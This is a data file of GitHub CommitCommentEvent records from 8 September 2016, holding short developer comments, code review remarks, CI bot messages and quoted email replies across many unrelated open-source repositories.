{"id":"4533426844","type":"CommitCommentEvent","actor":{"login":"Gaffi"},"repo":{"name":"Gaffi/SG-WL-Inventory"},"payload":{"comment":{"id":18943358,"position":null,"line":null,"path":null,"commit_id":"10223767adee4ba448c6f1fa6e8374213641c01c","created_at":"2016-09-08T11:33:47Z","updated_at":"2016-09-08T11:33:47Z","body":"This 'fixed' parts of the caching, but still not 100%."}},"created_at":"2016-09-08T11:33:47Z"}
{"id":"4533427132","type":"CommitCommentEvent","actor":{"login":"apals"},"repo":{"name":"Maljl/Quiz"},"payload":{"comment":{"id":18943359,"position":null,"line":null,"path":null,"commit_id":"f1af2d374a009d391b411d92fbb3058388e709fa","created_at":"2016-09-08T11:33:50Z","updated_at":"2016-09-08T11:33:50Z","body":"heja heja"}},"created_at":"2016-09-08T11:33:50Z"}
{"id":"4533428099","type":"CommitCommentEvent","actor":{"login":"GS05-13-ShuntaroOizumi"},"repo":{"name":"GS05-13-ShuntaroOizumi/kadai"},"payload":{"comment":{"id":18943361,"position":null,"line":null,"path":null,"commit_id":"82994ca24daafe80bda86b0af1f5c4fd2a884a92","created_at":"2016-09-08T11:34:06Z","updated_at":"2016-09-08T11:34:06Z","body":"課題提出"}},"created_at":"2016-09-08T11:34:06Z"}
{"id":"4533428859","type":"CommitCommentEvent","actor":{"login":"macic"},"repo":{"name":"arskom/spyne"},"payload":{"comment":{"id":18943362,"position":null,"line":null,"path":null,"commit_id":"0e762659f61179899043ec924c7b5ab45aef4a13","created_at":"2016-09-08T11:34:17Z","updated_at":"2016-09-08T11:34:17Z","body":"Hey again, the release is now there - 2.12.12 but still above commit is not included, could you please include it?"}},"created_at":"2016-09-08T11:34:17Z"}
{"id":"4533429064","type":"CommitCommentEvent","actor":{"login":"dianashk"},"repo":{"name":"pelias/api"},"payload":{"comment":{"id":18943363,"position":8,"line":null,"path":"test/unit/query/text_parser.js","commit_id":"57ec816d2734e050cf4c1b4c3908c1dc1a198501","created_at":"2016-09-08T11:34:20Z","updated_at":"2016-09-08T11:34:20Z","body":"any reason to leave these commented out things in the file?"}},"created_at":"2016-09-08T11:34:20Z"}
{"id":"4533430673","type":"CommitCommentEvent","actor":{"login":"torzborz"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18943364,"position":null,"line":null,"path":null,"commit_id":"6fefb7212dfc629ebc74af67d75a62d274a44c95","created_at":"2016-09-08T11:34:43Z","updated_at":"2016-09-08T11:34:43Z","body":"The confirmationToken field is also unique, but the length isn't specified so it defaults to 255 bytes too."}},"created_at":"2016-09-08T11:34:43Z"}
{"id":"4533432941","type":"CommitCommentEvent","actor":{"login":"christian-marie"},"repo":{"name":"christian-marie/git-vogue"},"payload":{"comment":{"id":18943366,"position":54,"line":157,"path":"lib/Git/Vogue/PluginCommon.hs","commit_id":"f1b98653558415c14aa2df1b15f7b8ad45b04edb","created_at":"2016-09-08T11:35:18Z","updated_at":"2016-09-08T11:35:18Z","body":"I mean, some of us do, man."}},"created_at":"2016-09-08T11:35:18Z"}
{"id":"4533434003","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18943368,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-08T11:35:31Z","updated_at":"2016-09-08T11:35:31Z","body":"Try e.g. Finder → File → Quick Look. This adds the name of the \ncurrently selected item.\n\nI think there are many of such instances.\n\n\nOn 8 Sep 2016, at 13:27, Kai Wood wrote:\n\n> Yes, as long as there is no open tab and the initial title \"Select \n> Document\" is visible, it shows the custom shortcut.\n>\n> But as soon as I have a file open and the menu title changes, it shows \n> the default shortcut. I disabled my global shortcuts to test properly, \n> the system ignores the custom one, the original one works. Looks like \n> they are handled as completely separate items by the OS.\n>\n> I couldn't find any other application that changes a menu title in \n> exact that way, if you have any suggestion I'd be happy to try it out.\n>\n> -- \n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/textmate/textmate/commit/dc0331b781246cf76d0f2dc3b71638d2677fac5d#commitcomment-18943324\n\n\n"}},"created_at":"2016-09-08T11:35:31Z"}
{"id":"4533440665","type":"CommitCommentEvent","actor":{"login":"stefaniapedrazzi"},"repo":{"name":"omichel/webots-doc"},"payload":{"comment":{"id":18943380,"position":4,"line":53,"path":"README.md","commit_id":"5d6614b7817e10749d7b2225257e0c4e5d7ddb82","created_at":"2016-09-08T11:37:06Z","updated_at":"2016-09-08T11:37:06Z","body":"I don't know if it was just a mistake, but we always create a a branch and a PR for any change, so that someone else can review it and everybody is notified about the change."}},"created_at":"2016-09-08T11:37:06Z"}
{"id":"4533441845","type":"CommitCommentEvent","actor":{"login":"thejrose1984"},"repo":{"name":"nZEDb/nZEDb"},"payload":{"comment":{"id":18943385,"position":null,"line":null,"path":null,"commit_id":"9c78f507b762759ed512cbe2d52332fea0a57438","created_at":"2016-09-08T11:37:24Z","updated_at":"2016-09-08T11:37:24Z","body":"Nope. Tried `composer create-project --no-dev --keep-vcs nzedb/nzedb` as well as pulling fresh code from git repository.\r\n\r\n2016/09/08 07:36:06 [error] 74164#102449: *1 FastCGI sent in stderr: \"PHP message: PHP Fatal error:  Call to a member function count() on boolean in /usr/local/www/nZEDb/app/models/Settings.php on line 83\" while reading response header from upstream, client: 192.168.1.14, server: 192.168.1.2, request: \"GET /install/step1.php HTTP/1.1\", upstream: \"fastcgi://unix:/var/run/php-fpm.sock:\", host: \"192.168.1.2\", referrer: \"http://192.168.1.2/install/\""}},"created_at":"2016-09-08T11:37:24Z"}
{"id":"4533443408","type":"CommitCommentEvent","actor":{"login":"dianashk"},"repo":{"name":"pelias/acceptance-tests"},"payload":{"comment":{"id":18943390,"position":51,"line":null,"path":"test_cases/autocomplete_street_centroids.json","commit_id":"446cc37a4ab51c7fc6d12c15586a2a95bea0284d","created_at":"2016-09-08T11:37:46Z","updated_at":"2016-09-08T11:37:46Z","body":"there must be additional data you can check on each one to make them unique since this will just be satisfied with a single item I believe.  "}},"created_at":"2016-09-08T11:37:46Z"}
{"id":"4533443686","type":"CommitCommentEvent","actor":{"login":"MarcinKosinski"},"repo":{"name":"mi2-warsaw/FSelectorRcpp"},"payload":{"comment":{"id":18943391,"position":null,"line":null,"path":null,"commit_id":"12790e7c82289f743d20f7de78f1aa7a9fe09d71","created_at":"2016-09-08T11:37:49Z","updated_at":"2016-09-08T11:37:49Z","body":"So this does not mean that 32bit-ver users will be happy :P\n\n2016-09-08 13:32 GMT+02:00 Zygmunt Zawadzki <notifications@github.com>:\n\n> There was a problem with 32bit java on appveyor, so I changed arch to x64:D\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mi2-warsaw/FSelectorRcpp/commit/12790e7c82289f743d20f7de78f1aa7a9fe09d71#commitcomment-18943355>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGdazipC7tGcZRAYIbB9ZzLAduTHc4Izks5qn_JigaJpZM4J34uD>\n> .\n>\n"}},"created_at":"2016-09-08T11:37:49Z"}
{"id":"4533443732","type":"CommitCommentEvent","actor":{"login":"christian-marie"},"repo":{"name":"christian-marie/git-vogue"},"payload":{"comment":{"id":18943392,"position":14,"line":48,"path":"lib/Git/Vogue/PluginCommon.hs","commit_id":"f1b98653558415c14aa2df1b15f7b8ad45b04edb","created_at":"2016-09-08T11:37:50Z","updated_at":"2016-09-08T11:37:50Z","body":"Trusty ordered maps... never let you down ;("}},"created_at":"2016-09-08T11:37:50Z"}
{"id":"4533443792","type":"CommitCommentEvent","actor":{"login":"gmouchakis"},"repo":{"name":"big-data-europe/docker-hive"},"payload":{"comment":{"id":18943393,"position":null,"line":null,"path":null,"commit_id":"f045946f91e966e3943d6994040b516d50af0ec7","created_at":"2016-09-08T11:37:50Z","updated_at":"2016-09-08T11:37:50Z","body":"I agree, let's wait until Hive releases the new version."}},"created_at":"2016-09-08T11:37:50Z"}
{"id":"4533443968","type":"CommitCommentEvent","actor":{"login":"757350134"},"repo":{"name":"757350134/iwaiting.com"},"payload":{"comment":{"id":18943395,"position":null,"line":null,"path":null,"commit_id":"49fcf83bb59178515f6dca418e0567189b03821e","created_at":"2016-09-08T11:37:53Z","updated_at":"2016-09-08T11:37:53Z","body":"Hello  world"}},"created_at":"2016-09-08T11:37:53Z"}
{"id":"4533444907","type":"CommitCommentEvent","actor":{"login":"mysticatea"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":18943400,"position":30,"line":82,"path":"lib/rules/comma-style.js","commit_id":"7502eedcf1835272d2b6893e7628a40ed8514404","created_at":"2016-09-08T11:38:07Z","updated_at":"2016-09-08T11:38:07Z","body":"Never.\r\n\r\nhttps://coveralls.io/builds/7794753/source?filename=lib%2Frules%2Fcomma-style.js#L83"}},"created_at":"2016-09-08T11:38:07Z"}
{"id":"4533445302","type":"CommitCommentEvent","actor":{"login":"kaspar030"},"repo":{"name":"kaspar030/RIOT"},"payload":{"comment":{"id":18943403,"position":9,"line":9,"path":"sys/include/event.h","commit_id":"bfa77830dbb25ff458f2c47f0a88470359a7e2ea","created_at":"2016-09-08T11:38:13Z","updated_at":"2016-09-08T11:38:13Z","body":"true that. Then again, this is in sys/, so I didn't want to havge the define in core.\r\nCurrently I'm biased towards a user-specified flag, so multiple loops can be waited for..."}},"created_at":"2016-09-08T11:38:13Z"}
{"id":"4533452793","type":"CommitCommentEvent","actor":{"login":"dianashk"},"repo":{"name":"pelias/acceptance-tests"},"payload":{"comment":{"id":18943414,"position":1,"line":null,"path":"test_cases/autocomplete_street_centroids.json","commit_id":"446cc37a4ab51c7fc6d12c15586a2a95bea0284d","created_at":"2016-09-08T11:40:00Z","updated_at":"2016-09-08T11:40:00Z","body":"we should also test for cases where the query doesn't specify layers and sources since that's more common"}},"created_at":"2016-09-08T11:40:00Z"}
{"id":"4533454021","type":"CommitCommentEvent","actor":{"login":"soroushwilson"},"repo":{"name":"soroushwilson/wilson1"},"payload":{"comment":{"id":18943418,"position":null,"line":null,"path":null,"commit_id":"be400839c5d966858512dde17231464b58870e27","created_at":"2016-09-08T11:40:18Z","updated_at":"2016-09-08T11:40:18Z","body":"soroush"}},"created_at":"2016-09-08T11:40:18Z"}
{"id":"4533455541","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18943423,"position":14,"line":86,"path":"compiler/backend-common/src/org/jetbrains/kotlin/backend/common/bridges/impl.kt","commit_id":"f148502100ccb483ae988fe80b34afbc1f6d6e1c","created_at":"2016-09-08T11:40:37Z","updated_at":"2016-09-08T11:40:37Z","body":"Why not just `descriptor.toString()`?"}},"created_at":"2016-09-08T11:40:37Z"}
{"id":"4533464905","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18943452,"position":null,"line":null,"path":null,"commit_id":"98b79672777853786f432db36e5c9c1f533e4a1c","created_at":"2016-09-08T11:42:47Z","updated_at":"2016-09-08T11:42:47Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dSgc8-btTRyKa4Xrtoj67A"}},"created_at":"2016-09-08T11:42:47Z"}
{"id":"4533472925","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18943477,"position":null,"line":null,"path":null,"commit_id":"313b58ac912586a5ca84042d70583b5a8a0da727","created_at":"2016-09-08T11:44:39Z","updated_at":"2016-09-08T11:44:39Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-08T11:44:39Z"}
{"id":"4533487103","type":"CommitCommentEvent","actor":{"login":"Vlandmist"},"repo":{"name":"astashko/Simple-Twitch"},"payload":{"comment":{"id":18943507,"position":null,"line":null,"path":null,"commit_id":"80235b083bf5f57ce7764e20ed79e0b593c57c5a","created_at":"2016-09-08T11:47:57Z","updated_at":"2016-09-08T11:47:57Z","body":"hey, cool project. can you explain to me why this webserver is needed and where it is hosted?\r\n\r\n"}},"created_at":"2016-09-08T11:47:57Z"}
{"id":"4533490193","type":"CommitCommentEvent","actor":{"login":"DangIsop"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":18943518,"position":null,"line":null,"path":null,"commit_id":"93f39efe3ef0ce9c25ef09ebef60ad2dfc1fe7f3","created_at":"2016-09-08T11:48:40Z","updated_at":"2016-09-08T11:48:40Z","body":"Hi Mosh / All,\r\nPlease can someone explain why we have CustomerForm in Movies: Vidly/Views/Movies/CustomerForm.cshtml\r\nOr is this a mistake?\r\n"}},"created_at":"2016-09-08T11:48:40Z"}
{"id":"4533492302","type":"CommitCommentEvent","actor":{"login":"pagour"},"repo":{"name":"pagour/Var"},"payload":{"comment":{"id":18943522,"position":null,"line":null,"path":null,"commit_id":"3de349e121c5e78350d4ed4836d61fadd04fcc0c","created_at":"2016-09-08T11:49:14Z","updated_at":"2016-09-08T11:49:14Z","body":"This is a test."}},"created_at":"2016-09-08T11:49:14Z"}
{"id":"4533492398","type":"CommitCommentEvent","actor":{"login":"shankarThiyagaraajan"},"repo":{"name":"flycartinc/cart"},"payload":{"comment":{"id":18943523,"position":null,"line":null,"path":null,"commit_id":"2b313b734b873022c63cd02829387c72cebce60c","created_at":"2016-09-08T11:49:15Z","updated_at":"2016-09-08T11:49:15Z","body":"For Minimizing cart item missing issue."}},"created_at":"2016-09-08T11:49:15Z"}
{"id":"4533492939","type":"CommitCommentEvent","actor":{"login":"plq"},"repo":{"name":"arskom/spyne"},"payload":{"comment":{"id":18943528,"position":null,"line":null,"path":null,"commit_id":"0e762659f61179899043ec924c7b5ab45aef4a13","created_at":"2016-09-08T11:49:22Z","updated_at":"2016-09-08T11:49:22Z","body":"huh. I could have sworn to have included it. have a look at 2.12.13 please. my apologies."}},"created_at":"2016-09-08T11:49:22Z"}
{"id":"4533504079","type":"CommitCommentEvent","actor":{"login":"andela-amwaleh"},"repo":{"name":"andela-lolo/office-space-allocation"},"payload":{"comment":{"id":18943566,"position":105,"line":79,"path":"app/database/amity_database.py","commit_id":"88589377b7716edaffd7369252b74f4a15609e66","created_at":"2016-09-08T11:51:54Z","updated_at":"2016-09-08T11:51:54Z","body":"DRY--> there only two types of Users Fellows and Staff I think you need only one flag for this \r\n`is_fellow =True`"}},"created_at":"2016-09-08T11:51:54Z"}
{"id":"4533504409","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"m-kuhn/QGIS"},"payload":{"comment":{"id":18943572,"position":17,"line":582,"path":"src/core/qgseditformconfig.cpp","commit_id":"e800ce5f00056683ff899d0888874ed2c73d9803","created_at":"2016-09-08T11:52:00Z","updated_at":"2016-09-08T11:52:00Z","body":"Should the intention here be to save the expression even if it's not enabled at the time of saving?"}},"created_at":"2016-09-08T11:52:00Z"}
{"id":"4533506332","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"HE-Arc/php-intro-framework"},"payload":{"comment":{"id":18943577,"position":2,"line":1,"path":"LICENSE","commit_id":"b1b90ea8e675e0be0948ef1de7953a03bbc93fc5","created_at":"2016-09-08T11:52:29Z","updated_at":"2016-09-08T11:52:29Z","body":"toi-même https://github.com/HE-Arc ;-)"}},"created_at":"2016-09-08T11:52:29Z"}
{"id":"4533507247","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"m-kuhn/QGIS"},"payload":{"comment":{"id":18943581,"position":17,"line":582,"path":"src/core/qgseditformconfig.cpp","commit_id":"e800ce5f00056683ff899d0888874ed2c73d9803","created_at":"2016-09-08T11:52:43Z","updated_at":"2016-09-08T11:52:43Z","body":"ah - dw. I see what's happening here."}},"created_at":"2016-09-08T11:52:43Z"}
{"id":"4533509987","type":"CommitCommentEvent","actor":{"login":"kaiwood"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18943589,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-08T11:53:22Z","updated_at":"2016-09-08T11:53:22Z","body":"Quick Look didn't work, but that's because I only guessed the default state (as soon as a Finder window opens, it's \"Quick Look $HOME\". \r\n\r\nBut Finder was a great suggestion: Compress has the same behavior. And I can perfectly rebind that one, behaves like it should and shows the new shortcut even if the title changes.\r\n\r\nSo it looks like the basic functionality is still available and it just doesn't work in TM2?"}},"created_at":"2016-09-08T11:53:22Z"}
{"id":"4533509975","type":"CommitCommentEvent","actor":{"login":"packardlabs"},"repo":{"name":"Impossibeard/character-sheet-5e"},"payload":{"comment":{"id":18943590,"position":21,"line":38,"path":"spec/models/dice_spec.rb","commit_id":"c05eaa73fdf4c33ee53274e55e09c8e797608db6","created_at":"2016-09-08T11:53:23Z","updated_at":"2016-09-08T11:53:23Z","body":"typo should be \"#minus\""}},"created_at":"2016-09-08T11:53:23Z"}
{"id":"4533517359","type":"CommitCommentEvent","actor":{"login":"andela-amwaleh"},"repo":{"name":"andela-lolo/office-space-allocation"},"payload":{"comment":{"id":18943612,"position":106,"line":80,"path":"app/database/amity_database.py","commit_id":"88589377b7716edaffd7369252b74f4a15609e66","created_at":"2016-09-08T11:55:09Z","updated_at":"2016-09-08T11:55:09Z","body":"I since there are only two roles only one needs to be conditioned\r\n```\r\nif role is 'staff':\r\n     is_fellow = False\r\n```"}},"created_at":"2016-09-08T11:55:09Z"}
{"id":"4533518541","type":"CommitCommentEvent","actor":{"login":"Meatballs1"},"repo":{"name":"adaptivethreat/BloodHound"},"payload":{"comment":{"id":18943618,"position":null,"line":null,"path":null,"commit_id":"c6ad08a93880e44eba689ee6f286663532cfb354","created_at":"2016-09-08T11:55:24Z","updated_at":"2016-09-08T11:55:24Z","body":"Any performance stats before and after? :) "}},"created_at":"2016-09-08T11:55:24Z"}
{"id":"4533520523","type":"CommitCommentEvent","actor":{"login":"mk-f"},"repo":{"name":"mkschreder/orangerpcd"},"payload":{"comment":{"id":18943627,"position":null,"line":null,"path":null,"commit_id":"ea57d5be8d2d14f792f80c67cd531340986bac18","created_at":"2016-09-08T11:55:51Z","updated_at":"2016-09-08T11:55:51Z","body":"The issue is still persistent on orange-rpcd-2.16.08-ae41b9aae88e002511f80607f2526403b786ed98"}},"created_at":"2016-09-08T11:55:51Z"}
{"id":"4533522083","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18943633,"position":null,"line":null,"path":null,"commit_id":"c6d257f328992e5e1c383d0bdff118f34aa48668","created_at":"2016-09-08T11:56:13Z","updated_at":"2016-09-08T11:56:13Z","body":"fixed"}},"created_at":"2016-09-08T11:56:13Z"}
{"id":"4533523742","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18943635,"position":null,"line":null,"path":null,"commit_id":"76979e3ee0b1d77ee25e1867cf6f4813fd16d7f2","created_at":"2016-09-08T11:56:35Z","updated_at":"2016-09-08T11:56:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9ZBkpiVi&#x2F;1723-bug-982707-doc-we-should-have-two-chapters-for-snapshots-one-for-rbd-and-one-for-pool-level\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 982707 - [doc] We should have two chapters for snapshots - one for RBD and one for Pool level</a>"}},"created_at":"2016-09-08T11:56:35Z"}
{"id":"4533526553","type":"CommitCommentEvent","actor":{"login":"malik-lamik"},"repo":{"name":"malik-lamik/Projects"},"payload":{"comment":{"id":18943642,"position":null,"line":null,"path":null,"commit_id":"892dd204ee7d329caa627cf0259d15e1969c6284","created_at":"2016-09-08T11:57:14Z","updated_at":"2016-09-08T11:57:14Z","body":"projet"}},"created_at":"2016-09-08T11:57:14Z"}
{"id":"4533527759","type":"CommitCommentEvent","actor":{"login":"sandroguimaraes"},"repo":{"name":"sandroguimaraes/totvs"},"payload":{"comment":{"id":18943645,"position":null,"line":null,"path":null,"commit_id":"fb02f7fde6067f7a5ea2f8ba1e61b4e1706f6e7f","created_at":"2016-09-08T11:57:33Z","updated_at":"2016-09-08T11:57:33Z","body":"TOTVS:\r\n\r\nProvedora de soluções de negócios para empresas de todos os portes, atua com softwares de gestão, plataformas de produtividade e colaboração, hardware e consultoria, com liderança absoluta no mercado SMB na América Latina."}},"created_at":"2016-09-08T11:57:33Z"}
{"id":"4533528192","type":"CommitCommentEvent","actor":{"login":"rserwin1"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18943648,"position":124,"line":176,"path":"woof-code/rootfs-skeleton/usr/bin/dir2pet","commit_id":"cd80fb134b90b0b3833f160cb34cf2b211a94d24","created_at":"2016-09-08T11:57:38Z","updated_at":"2016-09-08T11:57:38Z","body":"Mick Amadio wrote:\n>\n> @rserwin1 <https://github.com/rserwin1> I think you missed the point \n> of my intentions with the $comp variable. It was only designed as \n> default for the 'skip' option. 'xz' was to be the default for the \n> interactive mode with gzip default if the chip was an arm device. this \n> was quite intentional and @zigbert <https://github.com/zigbert> has so \n> far complained.\n>\n> Is there a reason you wanted the default to be gzip?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/puppylinux-woof-CE/woof-CE/commit/cd80fb134b90b0b3833f160cb34cf2b211a94d24#commitcomment-18935723>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ASod5oe0tZv1Aw_HJrIgwAgJiGqubfzMks5qnyd-gaJpZM4J3W4K>.\n>\nMick,\nMy intent was to make the default consistent with what you see when you \nenter dir2pet --help.  If you make it more complicated than that, please \nso state in the --help response.  Feel free to change it as you see fit, \nbut please be consistent.  Thanks for reviewing my effort there.\n\n"}},"created_at":"2016-09-08T11:57:38Z"}
{"id":"4533530210","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18943653,"position":null,"line":null,"path":null,"commit_id":"4babcdee29218ce894cfe256c1851921783e7d24","created_at":"2016-09-08T11:58:08Z","updated_at":"2016-09-08T11:58:08Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#G1dBmeqTQJ6q1OirVxDh3Q"}},"created_at":"2016-09-08T11:58:08Z"}
{"id":"4533531822","type":"CommitCommentEvent","actor":{"login":"454076513"},"repo":{"name":"454076513/media"},"payload":{"comment":{"id":18943656,"position":null,"line":null,"path":null,"commit_id":"bd2d310d7150a02513b52cb88f0acfacbd1082aa","created_at":"2016-09-08T11:58:28Z","updated_at":"2016-09-08T11:58:28Z","body":"sfsdf"}},"created_at":"2016-09-08T11:58:28Z"}
{"id":"4533532810","type":"CommitCommentEvent","actor":{"login":"yz89"},"repo":{"name":"str4d/zcash"},"payload":{"comment":{"id":18943660,"position":null,"line":null,"path":null,"commit_id":"825326f8549666aadb0c2d216c42436da44e23da","created_at":"2016-09-08T11:58:41Z","updated_at":"2016-09-08T11:58:41Z","body":"How to use this tool? \r\n`zcash-miner -daemon`\r\nLike this?"}},"created_at":"2016-09-08T11:58:41Z"}
{"id":"4533535889","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/libdroidjni"},"payload":{"comment":{"id":18943670,"position":null,"line":null,"path":null,"commit_id":"916b2efab7fe0962b13f7158500d435ffaf853ad","created_at":"2016-09-08T11:59:23Z","updated_at":"2016-09-08T11:59:23Z","body":"Not sure what you mean by \"overwriting\"..."}},"created_at":"2016-09-08T11:59:23Z"}
{"id":"4533538711","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18943677,"position":null,"line":null,"path":null,"commit_id":"1899d6ea472f4a2b327105fd5009e7a997bb3f5b","created_at":"2016-09-08T12:00:01Z","updated_at":"2016-09-08T12:00:01Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32387/testReport/) for this commit**"}},"created_at":"2016-09-08T12:00:01Z"}
{"id":"4533549819","type":"CommitCommentEvent","actor":{"login":"sandroguimaraes"},"repo":{"name":"sandroguimaraes/totvs"},"payload":{"comment":{"id":18943698,"position":null,"line":null,"path":null,"commit_id":"fb02f7fde6067f7a5ea2f8ba1e61b4e1706f6e7f","created_at":"2016-09-08T12:02:23Z","updated_at":"2016-09-08T12:02:23Z","body":"Provedora de soluções de negócios para empresas de todos os portes, atua com softwares de gestão, plataformas de produtividade e colaboração, hardware e consultoria, com liderança absoluta no mercado SMB na América Latina."}},"created_at":"2016-09-08T12:02:23Z"}
{"id":"4533550169","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18943700,"position":null,"line":null,"path":null,"commit_id":"ff31a1f63bf7b1e0ac3e0c6cdb0e4eb68c3a6916","created_at":"2016-09-08T12:02:27Z","updated_at":"2016-09-08T12:02:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 52](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12922&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-08T12:02:27Z"}
{"id":"4533552858","type":"CommitCommentEvent","actor":{"login":"luccioman"},"repo":{"name":"yacy/yacy_search_server"},"payload":{"comment":{"id":18943703,"position":null,"line":null,"path":null,"commit_id":"9462a32244a3faeb06ccf165afe230c5512bdd1e","created_at":"2016-09-08T12:03:02Z","updated_at":"2016-09-08T12:03:02Z","body":"Hello @reger24 , in Translator_p.html what about adding a title attribute to the translated text inputs? Because currently, when a translated text is long and is truncated, even if we just want to check it, we have to click the edit button to be able to read the whole.\r\n\r\nBest regards,\r\nLuc"}},"created_at":"2016-09-08T12:03:02Z"}
{"id":"4533559111","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18943712,"position":null,"line":null,"path":null,"commit_id":"ff31a1f63bf7b1e0ac3e0c6cdb0e4eb68c3a6916","created_at":"2016-09-08T12:04:23Z","updated_at":"2016-09-08T12:04:23Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 52](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12922&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:56"}},"created_at":"2016-09-08T12:04:23Z"}
{"id":"4533563151","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18943718,"position":null,"line":null,"path":null,"commit_id":"f3c27a540f1be965e2457faa8249d0e4f52653f4","created_at":"2016-09-08T12:05:15Z","updated_at":"2016-09-08T12:05:15Z","body":"still need to be tested on phone screen ;)"}},"created_at":"2016-09-08T12:05:15Z"}
{"id":"4533566904","type":"CommitCommentEvent","actor":{"login":"po2xel"},"repo":{"name":"po2xel/pybind11"},"payload":{"comment":{"id":18943724,"position":null,"line":null,"path":null,"commit_id":"216ad66f68fa8b2ae36a54658ba01a7ab01f513e","created_at":"2016-09-08T12:06:02Z","updated_at":"2016-09-08T12:06:02Z","body":"The reference count is increased and decreased immediately everytime the \"return none();\" is called. This ends with a corrupted reference cout."}},"created_at":"2016-09-08T12:06:02Z"}
{"id":"4533567236","type":"CommitCommentEvent","actor":{"login":"macic"},"repo":{"name":"arskom/spyne"},"payload":{"comment":{"id":18943727,"position":null,"line":null,"path":null,"commit_id":"0e762659f61179899043ec924c7b5ab45aef4a13","created_at":"2016-09-08T12:06:08Z","updated_at":"2016-09-08T12:06:08Z","body":"it's there, once again thanks @plq !"}},"created_at":"2016-09-08T12:06:08Z"}
{"id":"4533567544","type":"CommitCommentEvent","actor":{"login":"Vlandmist"},"repo":{"name":"PatrickRorth/Twitch.TV"},"payload":{"comment":{"id":18943728,"position":null,"line":null,"path":null,"commit_id":"945915206f329b9646314afa1956e9940365338b","created_at":"2016-09-08T12:06:11Z","updated_at":"2016-09-08T12:06:11Z","body":"hi guys, nice project. I'm trying to build something similar but with a different approach.\r\n\r\nI'd like to avoid using the Twitch.Player (which is slow) and use a simple `<video>` element. As `src=\"\"` I want to use direct link to the video stream like seen in this pic:\r\n![image](https://cloud.githubusercontent.com/assets/6247124/18348442/a21bcc88-75cb-11e6-91e8-55e7dd950f4c.png)\r\n\r\nSo if chunked (source) is available, I'll play that. It works. Video is played correctly.\r\n\r\nMy problem is that I need to retrieve these links using a php script, that I created following these instructions (https://johannesbader.ch/2014/01/find-video-url-of-twitch-tv-live-streams-or-past-broadcasts), \r\n\r\nand I can't host this php script in the webos project!\r\n\r\ndo you know if it's possible to achieve the same result (get the list of links) using an integrated WebOS service? \r\n\r\n\r\n\r\n"}},"created_at":"2016-09-08T12:06:11Z"}
{"id":"4533570736","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":18943734,"position":18,"line":44,"path":"pom.xml","commit_id":"abc65fc6ee8babf10fe06d853527301bac7f7693","created_at":"2016-09-08T12:06:51Z","updated_at":"2016-09-08T12:06:51Z","body":"Very good catch @PawelGutkowski  👍 "}},"created_at":"2016-09-08T12:06:51Z"}
